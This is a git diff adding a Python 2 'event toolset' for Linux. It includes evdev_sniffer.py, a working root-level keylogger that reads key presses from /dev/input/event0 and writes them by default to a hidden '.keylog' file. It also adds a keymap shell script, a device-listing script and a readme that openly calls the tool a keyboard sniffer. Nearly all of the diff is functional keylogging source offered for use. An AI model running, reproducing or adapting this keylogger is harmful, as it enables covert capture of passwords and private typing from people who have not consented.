added event_sniffer

evdev_sniffer.py

@@ -0,0 +1,80 @@
+#!/usr/bin/env python2
+#
+# ufh 2015
+# 
+
+import os
+import sys
+import evdev
+import argparse
+
+def rootCheck():
+	uid=os.getuid()
+	if uid != 0:
+		print '[*] You need r00t privileges to open event0'
+		return False
+	return True
+
+def run(args):
+
+	if not rootCheck():
+		sys.exit(1)
+	
+	fw = open(args.outfile,'wb')
+
+	dList = evdev.list_devices()
+	try:
+		dList.index(args.device)
+
+	except ValueError, e:
+		print 'Problem opening input: ',e
+		sys.exit(1)
+
+	dev = evdev.InputDevice(args.device)
+	name = dev.name
+	phys = dev.phys
+	print '[*] Found %s@%s' % (name,phys )
+
+	for e in dev.read_loop():
+		if e.type == evdev.ecodes.EV_KEY:
+
+			# get the categorzied object
+			ek = evdev.categorize(e)
+			# key_down
+			if ek.keystate == 1:
+				# print to console
+				if args.output:
+					print ek.keycode
+
+				# bring it in the right format
+				data = "%s" % ek.keycode
+				data = data.split('_')[1]
+				if data == 'SPACE' or data == 'BACKSPACE' or data == 'TAB' or data == 'ENTER':
+					data = ' %s ' % data
+				else:
+					data = '%s' % data
+					data = data.lower()
+
+				fw.write(data)
+				fw.flush()
+
+	fw.close()
+
+def main():
+	parser_desc = 'event keyboard sniffer'
+	prog_desc = 'event_sniffer.py'
+	parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc)
+	parser.add_argument('-o','--outfile',dest='outfile',required=False,action='store',help='where to write the sniffed data')
+	parser.add_argument('-d','--device',dest='device',required=False,action='store',help='different event device to sniff')
+	parser.add_argument('-O','--output',dest='output',required=False,action='store',help='print logged characters to screen')
+	args = parser.parse_args()
+	if not args.device:
+		args.device = '/dev/input/event0'
+
+	if not args.outfile:
+		args.outfile = '.keylog'
+
+	run(args)
+
+if __name__ == '__main__':
+	main()

gen_keymap.sh

@@ -0,0 +1,8 @@
+#!/bin/sh
+#
+# run as root, uses dumpkeys
+#
+echo 'ev1l blackh4t t00l - just kidding'
+echo "myDict={\\"
+dumpkeys |grep "^keycode"|sed -e 's/  / /g'|sed -e 's/  / /g'|cut -d ' ' -f 2,4|sed 's/ /:\"/g'|sed -e 's/$/\",/g'|tr -d '\n'
+echo "}"

map_devices.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python2
+# script for printing device information of /dev/input/event* devices
+#
+
+import os
+import sys
+import evdev as ev
+
+def checkRoot():
+	if os.getuid()!=0:
+		print '[*] You need root for that'
+		return False
+	return True
+
+if not checkRoot():
+	sys.exit(1)
+
+devList = ev.list_devices()
+devList.reverse()
+for inp in devList:
+	dev = ev.InputDevice(inp)
+	print "-"*60
+	print "[%s]" % inp
+	print "%s\n%s\n%s" % (dev.name, dev.info,dev.phys)
+print "-"*60

readme.txt

@@ -0,0 +1,52 @@
+event toolset
+=============
+
+little toolset for logging information from /dev/input/event* devices.
+for the sniffer i first opened the device by myself and parsed it, it worked. but worked much
+better with the evdev library.
+please be aware that root privs are needed.
+
+prerequisites
+-------------
+https://python-evdev.readthedocs.org/en/latest/
+pip2 install evdev
+
+map_devices.py
+--------------
+just print out information about all event devices on your system.
+# python2 map_devices.py 
+[...]
+------------------------------------------------------------
+[/dev/input/event14]
+Video Bus
+bus: 0019, vendor 0000, product 0006, version 0000
+LNXVIDEO/video/input0
+------------------------------------------------------------
+[/dev/input/event15]
+SynPS/2 Synaptics TouchPad
+bus: 0011, vendor 0002, product 0007, version 01b1
+isa0060/serio1/input0
+------------------------------------------------------------
+[...]
+
+evdev_sniffer.py
+----------------
+keyboard sniffer using the evdev library. write per default the logged data to .keylog ;)
+
+gen_keymap.sh
+-------------
+simple shellscript generating keymap for event_sniffer.py
+event_sniffer is not using the evdev library, so it is more independent.
+
+event_sniffer.py
+----------------
+well like evdev_sniffer but without the evdev_library :)
+
+thanks
+------
+thanks goes out to stealth for pointing me to this neat trick, he implemented back then via injectso.
+(http://stealth.openwall.net/local/injectso-0.52.tgz)
+
+author
+------
+dash@hack4.org